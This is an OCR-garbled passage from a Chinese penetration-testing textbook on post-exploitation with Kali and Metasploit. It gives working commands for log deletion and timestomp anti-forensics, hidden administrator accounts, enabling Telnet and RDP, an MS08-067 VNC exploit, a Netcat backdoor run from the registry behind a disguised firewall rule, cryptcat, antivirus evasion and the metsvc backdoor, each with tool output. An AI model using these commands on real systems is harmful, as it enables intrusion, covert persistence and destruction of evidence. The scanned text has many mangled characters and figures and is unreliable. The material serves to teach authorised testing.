at 12:51 /interactive cmd 
Added a new job with job ID = 1 


图 5.16 ”使 用 at 命 令 


meterpreter > getuid 
Server username: MI AUTHORITY\SYSTEM 


图 5.17 ”在 metetptetet 命 令 提 示 符 下 确认 权限 级 别 


正如 你 所 见 ， 权 限 已 经 提升 到 系统 级 别 。 


5.8 VIRAK A SEIRAK 
在 横向 升级 中 ， 攻 击 者 保留 其 现 有 的 凭据 ， 但 是 ， 用 它们 去 模拟 不 同 的 用 户 账户 。 例 如 ， 被 入 侵 系统 A 上 的 一 个 用 户 ， 去 攻 
击 系统 B 上 的 一 个 用 户 ， 尝 试 去 入 侵 系统 B。 


当 我 们 直到 一 些 向 量 攻 击 时 ， 例 如 远程 访问 攻击 ,我 们 将 使 用 横 同 权 限 升级 攻击 。 


5.9 ”消除 痕迹 


一 旦 一 个 系统 被 渗透 ， 攻 击 者 必须 掩饰 他 们 的 踪迹 ， 以 免 被 发 现 ， 或 者 至 少 为 防守 者 重 构 该 事件 制造 困难 。 

攻击 者 可 以 完全 删除 Windows 事 件 日 志 (如 果 它 们 保留 在 被 感染 的 服务 器 上 ) 。 这 些 可 以 通过 对 入 侵 系 统 使 用 一 个 命令 
shell， 并 使 用 以 下 命令 来 实现 : 

C:\ del SWINDIR%S\*.log /a/s/q/f 

/a 选项 直接 删除 所 有 日 志 ，/s 选 项 删除 包括 所 有 子 文件 夹 的 文件 。/q 选 项 禁用 所 有 的 查询 ， 这 些 查 询 要 求 有 一 个 yes 或 者 no 
的 回应 ，/f 选 项 强行 删除 文件 ， 使 得 恢复 更 加 困难 。 


也 可 以 通过 在 meterpreter 提 示 符 下 执行 clearev 命 令 来 删除 文件 。 该 命令 将 删除 目标 机 上 的 应 用 程序 、 系 统 和 安全 日 志 GE 
命令 没有 选项 和 人 参数 ) 。 

通常 情况 下 ， 删 除 一 个 系统 日 志 不 会 触发 任何 警报 。 事 实 上 ， 大 多 数组 织 都 是 随意 设置 日 志 系 统 ， 以 至 于 系统 日 志 丢失 被 视 
作 一 件 可 能 发 生 的 事情 ， 并 且 不 会 对 其 丢失 做 深入 的 调查 。 

Metasploit 有 一 个 绝招 ， 那 就 是 timestomp 选 项 ， 它 允许 攻击 者 更 改 一 个 文件 的 MACE 参 数 (一 个 文件 的 最 后 一 次 修改 、 
访问 、 创 建 ， 以 及 MFT 入 口 修改 时 间 ) 。 一 旦 系统 被 入 侵 ， 并 且 一 个 meterpreter shell 已 经 建立 ，timestomp 就 会 被 调用 ， 如 
图 5.18 所 示 。 


meterpreter > timestomp -h 


Usage: timestomp file path OPTIONS 


OPTIONS: 


-日 «opt» Set the “Last accessed" time of the file 

-b Set the MACE timestamps so that EnCase shows blanks 
-€ sopt> Set tho "creation" timo of tho filo 

-€ «opt» Set the "mft entry modified" time of the file 

-f «opt» Set the MACE of attributes equal to the supplied file 
-h Help banner 


Set the "last written" time of the file 

Set the MACE timestamps recursively on a directory 
-V Display the UTC MACE values of the file 

-Zz «opt» Set all four attributes (MACE) of the file 


-m «opt» 


P 


| 
P^ 


图 5.18 ”执行 tmestomp-h 命 令 
例如 ， 被 入 侵 系 统 ，C 盘 包含 一 个 名 叫 README.txt 的 文件 。 此 文件 的 MACE 值 表示 它 是 最 近 创建 的 ， 如 图 5.19 所 示 。 


meterpreter > timestonp README.txt -vw 


Modified : 2013-09-16 03:25:15 -0400 
Accessed : 2013-09-16 07:04:16 -0400 
Created : 2013-09-16 07:04:16 -0400 


Entry Modified: 2013-09-16 07:04:47 -0400 


图 5.19 ”执行 timestomp-v 命 令 


如 果 我 们 想 隐藏 这 个 文件 ， 我 们 可 以 将 其 移动 到 一 个 杂乱 的 目录 ， 如 Windows\System32 下 。 但 是 ， 这 个 文件 对 于 那些 根 
据 创 建 时 间或 其 他 MAC 人 参数 进 行 排 序 的 人 ， 是 显而易见 的 。 因 此 ， 使 用 下 面 的 命令 ,将 cmd.exe 文 件 中 的 MAC 信 息 复 制 到 
README.txt 文 件 中 。 


meterpreter>timestomp README.txt -f 
C:\\WINDOWS\system32\cmd.exe 


我 们 也 可 以 使 用 -b 选 项 来 清空 MAC 数 据 。 如 图 ?.20 所 示 ， 我 们 将 MAC 数 据 的 时 间 更 改 到 一 个 未 来 的 时 间 (21065F) 。 


meterpreter > timestomp README.txt -v 


Modified : 2013-09-16 03:75:15 -0400 
Accessed : 2013-08-16 07:04:16 -0400 
Created : 2013-08-16 07:04:16 -0400 


Entry Modified: 2013-09-16 0/:04:4/ -0400 
meterpreter > timestomp README.txt -b 

Blanking file MACE attributes on README.txt 
meterpreter > timestomp README.txt -v 


Modified ' 2106-02-07 01:28:15 -0500 
Accessed : 2106-02-07 01:28:15 -0500 
Created * 2106-02-07 01:28:15 -0500 


Entry Modified: 2106-02-07 01:28:15 -0500 


图 5.20 4% Fi] timestomp-v +P 4 $ zs AY I8] 


这 种 变化 会 引起 调查 者 的 注意 ， 但 他 们 也 无 法 利用 该 数据 进行 取证 分 析 。 来 自 于 原始 Windows 平 台 的 属性 看 起 来 是 什么 样 
AY? 如 果 一 个 系统 管理 员 调 用 一 个 文件 的 系统 属性 ， 但 是 文件 的 创建 和 修改 时 间 已 经 被 改 为 了 1601 年 (这 个 时 间 被 Microsoft 作 
为 初始 系统 启动 的 时 | 间 ) ， 与 此 相反 ， 文 件 的 上 次 访问 时 仍然 是 正确 的 ， 如 图 5.21 所 示 。 


README.txt Properties 


General | Summary | 


—— | 
=| README.txt 


Type of File: Text Document 


Opens with: Mi Notepad Change... 

| 
Location: E 
Size: 8.41 KB (8,614 bytes) 


Size on disk: — 12,0 KB (12,268 bytes) 


Created: Monday, January 01, 1601, 12:00:00 AM 
Modified: Monday, January 01, 1601, 12:00:00 AM 
Accessed. Today, September 16, 2013, 6:46:43 AM 


图 5.21 Windows 的 文件 属性 


虽然 这 是 预期 的 行为 ， 它 仍然 可 以 为 调查 者 提供 线 厅 。 为 了 能 够 彻底 的 破坏 调查 ， 攻 击 者 可 能 递归 地 改变 一 个 目录 下 所 有 的 
设置 时 间 ， 或 者 在 一 个 特定 的 驱动 器 上 所 有 的 设置 时 间 ， 只 需 执行 以 下 命令 : 


meterpreter>timestompC:\\ -r 
这 种 解决 方法 并 不 是 完美 的 。 很 明显 ， 已 经 发 生 了 一 个 攻击 。 此 外 ， 时 间 戳 很 可 能 存储 在 硬盘 的 其 他 位 置 ， 并 且 方 便 调 查 。 


如 果 目 标 系统 正在 使 用 入 侵 检 测 系统 来 监控 系统 的 变化 ， 例 如 Tripwire， 会 产生 timestomp 活 动 的 警报 。 因 此 ， 当 要 求 高 度 隐蔽 
时 ， 破 坏 时 间 戳 的 价值 是 有 限 的 。 


5.10 小结 


CARH, KEEMA T AESH, KRAMAR. BUXJZSZIBUBROS HIS ATR. Feii] 
YE Y AERAR SIA EMR B+, BRAK, GUEST RASA, FMA RAR. 


在 下 一 草 中 ， 我 们 将 学 习 如 何 创建 一 个 可 持续 访问 的 后 门 ， 我 们 将 学 到 与 被 入 侵 系 统 进 行 隐 散 通信 的 技术 。 


Or ”后 期 利用 一 一 持久 性 


攻击 者 杀 链 的 最 后 阶段 是 “命令 、 控 制 、 通 讯 ” 阶 段 ， 在 此 期 间 ， 攻 击 者 依赖 一 个 与 被 入 侵 系统 的 持续 连接 ， 保 证 他 们 能 继 
续 控制 被 入 侵 系 统 。 


为 了 实现 高 效 运 行 ， 攻 击 者 必须 能 够 保持 持久 交互 (interactive persistence) 一 一 他 们 必须 与 被 攻击 系统 保持 双 同 通信 
(3E) ， 与 被 入 侵 的 系统 保持 长 期 的 交互 而 不 被 友 现 (持久 性 ) 。 这 种 类 型 的 连接 需求 的 原因 如 下 : 

-可 能 检测 到 网 络 入 侵 ， 被 入 侵 的 系统 可 能 识别 并 打 补 丁 。 

-一些 攻 击 只 能 使 用 一 次 ， 因 为 漏洞 是 间歇 性 的 ， 渗 透 攻 击 可 能 导致 系统 失效 ， 或 者 因为 攻击 改变 了 系统 ， 漏 洞 表现 为 不 可 用 。 

-由 于 各 种 原因 ， 攻 击 者 可 能 需要 多 次 返回 到 相同 的 目标 。 

: 当 目 标 被 攻破 ， 不 可 能 立即 就 知道 目标 的 利用 价值 。 


用 来 维持 持久 交互 的 工具 ， 在 经 典 的 术语 里 ， 简 称 为 后 |] (backdoor) 或 者 恶意 软件 (rootkit) 。 但 是 ， 目 动 化 的 恶意 软 
件 和 人 为 攻击 已 经 使 传统 标签 的 意义 变 得 模糊 。 与 乙 相 反 ， 这 种 打算 在 逢 入 侵 系 统 上 停留 较 长 时 间 的 有 恶意 软件 ， 补 称 为 持久 代理 


(persistent agents) 。 


这 些 持久 代理 为 攻击 者 和 测试 者 执行 计 多 功能 ， 主 要 包括 如 下 功能 : 

允许 上 传 的 额外 工具 支持 新 的 攻击 ， 特 别 是 对 位 于 同一 网 络 的 系统 。 

.便于 从 被 入 侵 的 系统 和 网 络 中 外 泄 数据 。 

允许 攻击 者 和 被 入 侵 系统 重新 连接 ， 通 常 通过 加 密 信道 来 避免 探测 。 众 所 周知 ， 持 久 代理 在 被 入 侵 系统 的 停留 时 间 超过 一 年 。 
采用 反 取证 技术 来 避免 被 发 现 ， 包 括 在 目标 文件 系统 或 系统 内 存 中 隐藏， 使 用 强 认证 和 加 密 技术 。 


ERAR, AZT RELATI LA: 


-破解 现 有 的 系统 和 应 用 程序 文件 ， 进 行 远 程 访问 。 
使 用 持久 代理 。 

使 用 Metasploit 框 架 保 持 持久 性 。 

` 重 定 同 端 口 来 绕 过 网 络 控制 。 


6.1 ”破解 现 有 的 系统 和 应 用 程序 文件 进行 远程 访问 


最 好 的 持久 代理 无 须 隐 藏 ， 因 为 它 是 被 入 侵 系 统 现 有 文件 结构 的 一 部 分 ， 攻 击 者 只 需 添加 某 些 功能 ， 将 剃 规 的 系统 文件 和 应 
用 程序 转变 为 持久 代理 。 这 种 方法 几乎 从 未 被 安全 控制 机 制 ( 比 如， 入 侵 检测 系统 ) 友 现 。 


6.1.1 局 用 远程 服务 


作为 维护 远程 接 入 的 一 种 技术 ， 是 用 Metasploit 框 架 来 局 用 Windows 平 台 的 Telnet 服 务 ， 并 用 它 来 提供 持久 性 。 


攻破 目标 系统 的 第 一 步 是 获得 meterpreter 会 话 (迁移 会 话 以 确保 一 个 稳定 的 shell) ， 然 后 提升 访问 权限 。 随 后 ， 获 得 本 地 


命令 shell， 使 用 如 下 命令 来 访问 目标 系统 : 


meterpreter> execute -H -Ë cmd -i 


当 执 行 时 ， 该 命令 创建 一 个 交互 命令 shell (-i) ， 该 shell 元 当 隐藏 的 进程 (-H) . 


使 用 shell 命 令 提示 符 ， 创 建 一 个 新 用 尸 账 尸 。 当 创建 新 用 尸 账户 来 确保 持久 性 时 ， 许 多 攻击 者 使 用 如 下 两 部 分 策略 : 


` 当 攻击 被 发 现时 ， 使 用 能 吸引 注意 力 的 名 字 创 建 账 户 〈 例 如 : Leet7737) . 
-创建 一 个 账户 ， 例 如 Service_Account， 该 账户 看 起 来 是 正常 系统 功能 的 一 部 分 ， 使 用 如 下 命令 : 


C:\net user Service Account password /ADD 


C:\net localgroup administrators Service Account /ADD 
当 新 用 户 账户 已 经 创建 成 功 时 ， 退 出 Windows 命 令 shell。 为 了 开启 Telnet， 在 meterpreter 提 示 符 后 执行 如 下 命令 : 
run gettelnet -e 


上 述 命令 的 执行 结果 ， 显 示 在 图 6.1 中 。 


meterpreter > run gettelnet -e 
| Windows Telnet Server Enabler Meterpreter Script 
setting lelnet Server Services service startup mode 
The Telnet Server Services service is not set to auto, changing it to au 
to 
Üpening port in Local firewall if necessary 
For cleanup use command: run multi console command -rc /root/.msf4/logs/scri 
pts/gettelnet/clean up 20130920.2039.rc 


图 6.1 运行 gettelnet — e4p-- 


图 6.1 显 示 脚 本 在 被 入 侵 系统 中 ， 创 建 了 一 个 持久 的 Telnet 服 务 。 为 了 访问 它 ， 需 要 用 Telnet 协 议 连 接 目标 系统 的 I|P 地 址 ， 
提供 创建 用 户 账 尸 时 输入 的 用 户 名 和 密码 ， 如 图 6.2 所 示 。 


iOtükali:-£ telnet 192.168.43.128 
Trying 192.1B58,43.128... 
Connected to 1372.168.43.1283 
Escape character is '^J]' 


Welcome to Microsoft Telnet Service 


mm cum e es O DO-ROROR  HONCIM OMS E RS mc N O D ccm COSMOS E E GN mum E E E  EREIMO EE E ss  muemeeeeen 


Welcome to Micros oft Telnet Server. 


C:\Documents and settings\service _ Account 


to 


Ao.2 ”运行 Telent 服 务 


Telnet 服 务 将 一 直 继 续 下 去 ， 直 到 被 删除 。 不 幸 的 是 ， 使 用 Telnet 时 存在 一 些 限制 : 容易 被 检测 到 (因为 凭据 是 以 明文 传输 
AY) ， 并 且 功 能 仅仅 存在 于 命令 行 模式 中 。 


但 是 ， 如 果 你 需要 有 一 个 GU| 来 访问 被 入 侵 系 统 中 的 某 些 应 用 程序 时 ， 你 该 怎么 办 呢 ? 
6.1.2 ”启用 远程 Windows 终 端 服 务 

确保 远程 接 入 ， 一 种 最 可 靠 的 技术 是 持续 开启 Windows 终 端 服务 ， 也 就 是 众所周知 的 远程 桌面 协议 (Remote Desktop 
Protocol, RDP) 。 这 样 做 ， 需 要 有 管理 员 的 权限 和 目标 操作 系统 的 版 本 号 。 


例如 ， 如 果 目 标 操 作 系 统 是 Windows 7， 使 用 meterpreter 获 得 一 个 目标 系统 交互 命令 shell， 之 后 输入 以 下 命令 行 来 修改 
注册 表 : 


C:\ reg add "hklm\system\currentControlSet\Control\Terminal 
Server" /v "AllowTSConnections" /t REG DWORD /qd 0x1 /f 


C:\reg add "hklm\system\currentControlSet\Control\Terminal 
Server" /v "fDenyTSConnections" /t REG DWORD /d 0x0 /f 


为 了 确保 RDP 协 议 能 够 通过 客户 端的 防火 墙 ， 需 使 用 如 下 命令 添加 一 条 规则 : 


C:\ netshadvfirewall firewall set rule group="remote desktop" 
new enable=Yes 


现在 ,使 用 如 下 命令 开局 RDP 服 务 : 


C:\net start Termservice 


这 样 局 动 的 RDP 服 务 没有 持久 性 ， 使 用 如 下 命令 ,确保 计算 机 每 次 开局 时 都 能 局 动 RDP 服 务 : 
C:\sc configTermService start= auto 


启动 RDP 服 务 过 程 并 不 十 分 复杂 ， 但 是 应 该 照 本 宣 科 来 减少 出 错 的 可 能 性 ， 特 别 是 对 系统 注册 表 进 行 操作 时 。 季 运 的 
是 ，meterpreter 框 架 是 使 用 GETGUI 脚 本 来 自动 开启 RDP 服 务 。 


当 从 meterpreter 命 令 提 示 符 运行 命令 时 ， 在 下 图 6.3 中 所 显示 的 命令 行 能 够 创建 用 户 名 和 密码 ， 从 登录 界面 隐藏 账户 ， 并 
上 且 对 注册 表 进 行 必要 的 更 改 来 保持 持久 性 。 图 6.3 显 示 了 用 来 创建 狐 似 合法 上 且 带 有 简单 密码 的 账户 的 用 户 名 ， 比 如 Service 


Account。 


meterpreter > run getgui -u Service Account -p pa$$word 
| Windows Remote Desktop Configuration Meterpreter Script by Darkoperator 
| Carlos Perez carlos perez@darkoperator.com 
setting user account for logon 
Adding User: Service Account with Password: pa$$word 
Hiding user from Windows Login screen 
Adding User: Service Account to local group ‘Remote Desktop Users’ 
| Adding User: Service Account to local group 'Administrators' 
*| You can now Login with the created user 


"] For cleanup use command: run multi console command -rc /root/.msf4/logs/scri 
pts/getgui/clean up  20130920.1313.rc 


图 6.3 ”在 metetptetet 提 示 符 下 创 建 账户 


为 了 连接 到 入 侵 系 统 的 远程 桌面 ， 使 用 Kali 的 rdesktop 程 序 。 
6.1.3 ”局 用 远程 虚拟 网 络 计算 


如 果 系 统 中 包含 可 以 被 入 侵 的 应 用 程序 (特别 是 远程 接 入 程序 ) ， 攻 击 者 很 有 可 能 利用 这 泽 弱 点 来 攻击 系统 ， 比 如 : 


:攻击 者 很 可 能 从 注册 表 中 为 菜 些 程 序 提取 远程 接 入 密码 。VNC 程 序 在 注册 表 中 存放 密码 ， 这 些 密码 可 以 通过 手动 提取 注册 表 项 ， 或 者 通过 执 
行 应 用 程序 得 到 ， 比 如 NirSoft 的 VNCPassView 程 序 。 


不同 版 本 的 VNC 包 含 了 不 同 的 漏洞 ， 可 以 利用 这 些 来 入 侵 应 用 程序 ， 从 而 远程 接 入 目标 系统 。 如 采用 户 安 装 了 最 新 版 本 ， 攻 击 者 可 能 会 番 载 
该 版 本 ， 并 在 该 位 置 上 安装 旧版 本 。 由 于 版 本 功能 的 相似 性 ， 用 户 可 能 注意 不 到 这 些 改变 ,但 是 攻击 者 可 以 利用 老 版 本 发 现 的 漏洞 来 绕 过 映 份 
认证 ， 以 此 来 保持 在 后 期 渗透 攻击 阶段 的 接 入 。 


Metasploit 能 够 利用 VNCINJECT 模 块 ， 把 VNC 直 接 注入 到 被 攻击 系统 中 。 


在 图 6.4 中 ，VNKC 作 为 有 效 载 傈 ， 取 代 单 规 的 reverse TCP shell, 


msf > use windows/smb/msO8 06/7 netapi 

mst exploit(ms08 067 netapi) > set PAYLOAD windows/vncinject/bind tcp 
PAYLOAD => windows/vncinject/bind tcp 

msf exploit(ms08 067 netapi) > set RHOST 192.168.43.128 

RHOST => 192.168.43.128 

msf exploit(ms08 067 netapi) » exploit 


] Started bind handler 

| Automatically detecting the target... | 
| Fingerprint: Windows XP - Service Tight VNC: rwbeaas-1e69067 m SEHE 
] Selected Target: Windows XP SP3 E 3 edict ha — 
] Attempting to trigger the vulnera 
| 
| 
| 
| 
| 


— — 


sending stage (445440 bytes) to! px — | i 
Starting local TCP relay on 127.0995 BoC ee ay Rah) 


Local ICP relay started. Microsoft Windows ¥P [Version 5. | 2600] 
y 
Launched vncviewer CC) Copyright 1985-2001 Microsoft Corp. 


Session 1 created in the backgro C:\WINDOWES \s ystem32> 
sf exploit(ms08 067 netapi) > Conneciie | 

.8 

Enabling TightVNC protocol extensions 
No authentication needed 
Authentication successful | h 


Desktop name "rwbeggs-1e69067' HEENENNENM — 2 LL |]Á9— | |. 


图 6.4 MVNCHA reverse TCP shell 


这 种 攻击 不 需要 任何 认证 。 如 果 你 在 测试 一 个 客 己 的 网 站 ， 确 保 所 有 被 证 实 的 漏洞 应 用 已 经 从 被 攻击 系统 中 移 除 。 否 则 ， 你 
相当 于 创建 了 一 个 会 被 其 他 攻击 者 故 现 ， 并 利用 的 接 入 氮 。 


6.2 使 用 持久 代理 


传统 意义 上 ， 前 门 〈(front door) 为 合法 的 用 尸 提 供认 证 接 入 ， 而 攻击 者 会 在 被 攻击 的 系统 上 植 入 一 个 后 门 ， 后 门 程序 允许 
攻击 者 返回 被 攻破 系统 ， 获 得 服务 和 数据 。 


不 镁 的 是 ， 经 典 的 后 门 程序 提供 有 限 的 交互 ， 它 不 是 为 了 能 够 在 被 攻破 系统 上 停留 较 长 时 间 而 设计 的 。 传 统 后 门 最 显著 的 缺 
Re: 一 有 旦 这 个 后 门 被 友 现 移 除 后 ， 攻 击 者 只 能 重复 攻击 过 程 来 攻破 系统 ， 而 这 是 非常 困难 的 ， 因 为 预警 系统 的 省 理 员 会 对 网 络 
和 资源 进行 防护 。 


Kali 现 在 以 持久 代理 为 重点 ， 如 果 使 用 得 当 ， 很 难 友 现 持久 代理 。 我 们 将 回顾 第 一 个 令 人 敬佩 的 工具 Netcat。 


使 用 Netcat 作 为 持久 代理 


Netcat 利 用 “原始 ”的 TCP 和 UDP 数据 包 ， 文 持 从 网 络 连接 中 读数 据 、 写 数据 。 与 Telnet 或 者 FTP 服 务 形成 的 数据 包 不 
同 ，Netcat 的 数据 包 不 具有 包头 和 其 他 特殊 信道 信息 。 这 简化 了 通信 ， 并 考虑 了 适应 大 部 分 通信 信道 。 


最 新 的 稳定 版 本 由 Hobbit 在 1996 年 友 行 ， 它 保持 了 和 以 往 一 样 的 强大 功能 。 它 经 党 被 称 为 TCP/IP 瑞 士 军刀 (TCP/IP Swiss 
army knife) 。Netcat 可 以 完成 许多 功能 ， 主 要 列举 如 下 : 


端口 扫描 。 
-提取 用 来 识别 服务 的 标志 。 


“Sig O XE |B] ACE 
文件 转移 和 网 上 聊天 ， 包 括 文 持 数据 取证 和 远程 备份 。 
-在 被 攻破 系统 上 ， 作 为 后 门 或 者 持久 交互 代理 。 


基于 这 点 ， 我 们 将 重点 关注 利用 Netcat 在 和 家 攻破 系统 上 创建 一 个 持久 shell。 尽 管 随后 的 例子 是 用 Windows 作 为 目标 平台 ， 
但 它 在 基于 UNIX 系 统 的 平台 上 也 友 挥 同样 的 功能 。 


在 图 6.5 中 可 以 看 到 ， 我 们 将 保留 可 执行 文件 的 名 字 一 一 nc.exe， 在 使 用 前 ， 普 遍 对 其 重新 命名 ， 以 最 小 化 其 被 探测 到 的 可 
能 性 。 即 使 它 已 经 锐 重 命名 ， 通 党 也 会 被 反 病 毒 软件 友 现 ;许多 攻击 者 会 修改 或 者 移 除 Netcat 源 代码 中 的 不 需要 的 元 素 ， 并 在 
使 用 前 重新 编译 ;这 样 的 变化 能 够 改变 反 病 毒 软件 用 来 识别 应 用 的 签名 ， 比 如 Netcat， 这 会 使 反 病 毒 软件 对 其 不 可 见 。 


Netcat 存 储 在 Kali 的 /usr/share/windows-binaries 库 中 。 从 内 部 meterpreter 输 入 如 下 的 命令 ， 可 以 上 传 到 被 攻破 系统 
中 : 


meterpreter> upload/usr/share/windows-binaries/nc.exe 
C:\\WINDOWS\\system32 


上 述 命令 执行 的 结果 ， 如 图 6.5 所 示 。 
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\WINDOWS\\system3? 


| uploading : /usr/share/windows-binaries/nc.exe -> c:\WINDOWS\system32 
"] uploaded : /usr/share/windows-binaries/nc.exe -> c:\WINDOWS\system32\nc .ex 


图 6.5 上传 Netcat 的 屏幕 截图 


你 无 须 专 门 把 Netcat 放 在 system32 文 件 夹 中 ; 但 是 ， 由 于 此 文件 夹 中 文件 的 数量 和 文件 类 型 的 多 样 性 ， 这 是 隐藏 在 感染 系 
统 文件 的 最 佳 位 置 。 


局 当 在 客户 端 进行 渗透 测试 时 ， 我 们 及 现在 一 合 服务 硕 上 有 6 个 独立 的 Netcat 实 例 。 有 两 个 是 被 两 个 不 同 的 系统 管理 员 安装 ， 用 以 文 持 网 络 
常理， 其 他 4 个 实例 是 航 外 部 攻击 者 安 枝 ， 直 到 渗透 测试 开始 都 没有 被 发 现 。 因 此 ， 要 经 种 检查 目标 机 右上 和 是 售 安装 Netcat。 


如 果 没 有 meterpreter 连 接 ， 需 要 用 简单 文件 传输 协议 (Trivial File TransferProtocol, TFTP) 来 传输 文件 。 


接着 ， 用 如 下 命令 配置 注册 表 ， 使 系统 开始 运行 ， 并 启动 Netcat; 确保 监听 端口 444 (或 者 你 选择 的 其 他 任何 长 期 不 被 使 用 
Ain) : 
meterpreter>reg setval -k 


HKLM\\software\\microsoft\\windows\\currentversion\\run -vv nc 
-d 'C:\\windows\\system32\\nc.exe -Ldp 444 -e cmd.exe' 


用 如 下 queryval 命 令 来 确认 已 成 功 修改 注册 表 : 


meterpreter>reg queryval -k 
HKLM\\software\\microsoft\\windows\\currentverion\\run -vv nc 


f&Rdnetshap o, FANERA XB, FioERSDRIDANTISIKUBEREXVREEERZEUNetcat, BES MSS ASR in 
操作 系统 信息 。Windows Vista. Windows Server 2008 和 最 新 版 本 使 用 netsh advfirewall firewall 命 令 行 环境 ， 而 之 前 的 操作 
系统 使 用 netsh firewall。 


为 了 增加 端口 到 本 地 防火 墙 ， 需要 在 meterpreter 提 示 符 后 输入 shell 命 令 ， 然 后 使 用 适当 的 命令 规则 。 当 对 规则 进行 命名 


时 ， 比 如 svchostpassthrough， 名 字 应 该 暗示 此 规则 对 系统 的 正音 运行 有 重要 作用 。 示 例 命令 显示 如 下 。 


C:\Windows\system32>netsh firewall add portopening TCP 444 


"service passthrough" 
用 如 下 命令 确认 修改 已 成 功 : 


C:\windows\system32>netsh firewall show portopening 


图 6.6 显 示 了 上 述 命令 执行 的 结果 : 


meterpreter > shell 

Process 1016 created. 

Channel 3 created. 

Microsoft Windows XP [Version 5.1.2500] 
(C) Copyright 1985-2001 Microsoft Corp. 


C:\WINDOWS\systems2=netsh firewall add portopening ICP 444 "svchost passthrough" 


netsh firewall add portopening TCP 444 "svchost passthrough” 
Ok . 


C:\WINDOWS\systems2=netsh firewall show portopening 
netsh firewall show portopening 


Port configuration for Standard profile: 
Port Protocol Mode Name 


444 TCP Enable svchost passthrough 


图 6.6 ”增加 端口 连接 


当 端 口 规则 确定 后 ， 确 保重 启 选 项 启动 。 


在 meterpreter 提 示 符 后 输入 如 下 命令 : 
meterpreter> reboot 


-在 交互 式 Windows shell 中 输入 如 下 命令 : 


C: \windows\system32>shutdown -r -t 00 


为 了 远程 接 入 被 入 侵 系统 ， 在 命令 提示 符 下 输入 nc， 表 示 连 接 的 详细 程度 (参数 -v 表 示 报 告 基本 信息 ， 参 数 -ww 表示 报告 更 


多 详细 的 信息 ) ， 然 后 输入 目标 的 IP 地 址 和 端口 号 ， 如 图 6.7 所 示 。 


rootükali:-€ nc -v 192.168.43.128 444 


192.168.43.128: inverse host Lookup failed: Unknown server error : 


med out 

(UNKNOWN) [192.168.43.128] 444 (snpp) open 
Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 


C:\Documents and Settings\DigitalDefence>§j 


Connection ti 


图 6.7 使 用 nc 命令 


不 斑 的 是 ， 在 使 用 Netcat 时 存在 一 些 限制 : 没有 认证 机 制 ， 对 传输 的 数据 没有 加 密 ， 几 乎 能 够 被 所 有 的 反 病 毒 软件 检测 


可 以 用 cryptcat 来 加 密 ，cryptcat 是 Netcat 的 变 体 。 在 攻击 者 与 被 入 侵 系统 的 传输 中 ， 它 运用 Twofish 算 法 加 密 数 据 。 
Twofish 加 密 算 法 是 由 Bruce Schneier 提 出 的 一 种 高 级 对 称 分 组 加 密 算法 ， 可 以 为 加 密 的 数据 提供 强 有 力 的 保护 。 


使 用 cryptcat， 确 保有 一 个 准备 好 的 监听 者 ， 并 配置 强壮 的 密码 ， 使 用 如 下 命令 进行 配置 : 
root@kali:~# cryptcat -k password -1 -p 444 

接 下 来 ， 上 传 cryptcat 到 被 入 侵 的 系统 ， 使 用 如 下 命令 进行 配置 ， 使 其 连接 到 监听 者 的 IP 地 址 : 
C:\cryptcat -k password <listener IP address> 444 


不 斑 的 是 ， 大 多 数 的 有 反 病 毒 软件 能 检测 到 Netcat 和 和 它 的 变 体 。 可 以 用 16 进 制 编辑 器 对 Netcat 源 代码 进行 编辑 ， 使 其 不 能 被 
检测 到 ;这 将 有 助 于 避免 触 友 反 病毒 软件 的 签名 匹配 行为 ， 但 是 ， 这 可 能 是 一 个 漫长 的 试 错过 程 。 更 有 效 的 方法 是 利用 
Metasploit 框 以 的 持久 性 机 制 的 优势 。 


6.3 ”使 用 Metasploit 框 架 保 持 持久 性 


Metasploit 的 meterpreter 包 合 几 个 脚本 ， 支 持 与 被 入 侵 系 统 保持 持久 性 的 脚本 。 我 们 将 讨论 其 中 两 个 脚本 ， 可 以 植 入 入 侵 
系统 作为 后 门 的 两 个 脚本 : metsvc 和 和 persistence。 


6.3.1 使 用 metsvc 脚 本 


metsvc 脚 本 是 meterpreter 的 网 络 服务 封 疼 器 ， 可 以 作为 一 种 Windows 服 务 或 者 在 命令 行程 序 中 运行 。 它 通常 被 作为 后 
门 ， 用 来 与 被 入 侵 系统 保持 通信 。 


为 了 使 用 metsvc， 首 先 应 攻破 该 系统 ， 然 后 将 meterpreter 迁 移 到 explorer.exe 进 程 中 ， 获 得 更 稳定 的 shell。 


通过 调用 run 命 令 ， 执 行 metsvc 代 理 如 图 6.8 所 示 。 可 以 看 到 ， 它 创建 了 一 个 临时 安 凌 的 目录 ， 上 传 三 个 文件 (metsrv.dll, 


metsvc-server.exe 和 metsvc.exe) ， 随 后 启动 metsvc。 


meterpreter > run metsvc 
Creating a meterpreter service on port 31337 
Creating a temporary installation directory C:\DOCUME~1L\DIGITA~1\LOCALS~1\Te 
mpXCvj rsZWOMK... 
>> Uploading metsrv.dll... 
>> Uploading metsvc-server.exe... 
>> Uploading metsvc.exe... 
starting the service... 
* Installing service metsvc 
* Starting service 
service metsvc successfully installed. 


图 6.8 ”运行 metsvc 


为 了 与 持久 metsvc 代 理 交 互 ， 攻 击 者 打开 Metasploit 框 架 ， 选 择 use exploit/multi/handlerfYwindows/metsvc_bind_ tcp 
作为 有 效 载荷 ， 如 图 6.9 所 示 ， 同 时 设置 其 他 参数 (1IP 地 址 和 端口 ) 。 


msf > use exploit/multi/handler 

mst exploit(handler) > set PAYLOAD windows/metsvc bind tcp 
PAYLUAD => windows/metsvc bind tcp 

msf exploit(handler) > set | PORT 31337 

LPORT => 31337 


msf exploit(handler) > set RHOST 192.158.43.128 
RHOST => 192.168.43.128 
msf exploit(handler) > show options 


Module options (exploit/multi/handLer): 


Name Current Setting Required Description 


Payload options (windows/metsvc bind tcp): 


Name Current an dba. Requi red UBT ta 

EXITFUNC process yes Exit technique: seh, thread, process, no 
ne 

LPORT 31337 yes The listen port 

RHOST 192.168.43.128 no Ihe target address 


Exploit target: 


Id Name 


G Wildcard Target 


图 6.9 ”运行 windows/metsvc_bind_tcp 等 命令 


执行 exploit 命 令 后， 在 两 个 系统 中 直接 打开 一 个 会 话 ， 它 允许 提升 权限 ， 并 实现 其 他 从 命令 行 局 动 的 功能 。exploit 命 令 执 
行 的 结果 如 图 6.10 所 示 。 


msf exploit(handler) > exploit 


[*] Starting the payload handler.. 

[*] Started bind handler 

[*] Meterpreter session 1 opened (192.168.43.130:44930 -» 192.168.43.128:31337) at 2013 
-09-18 15:50:45 -0400 


r r > pwd 
C:\WINDOWS\system32 
meterpreter > getuid 
server username: NT AUTHORITY\SYSTEM 


图 6.10 ”运行 exploit 


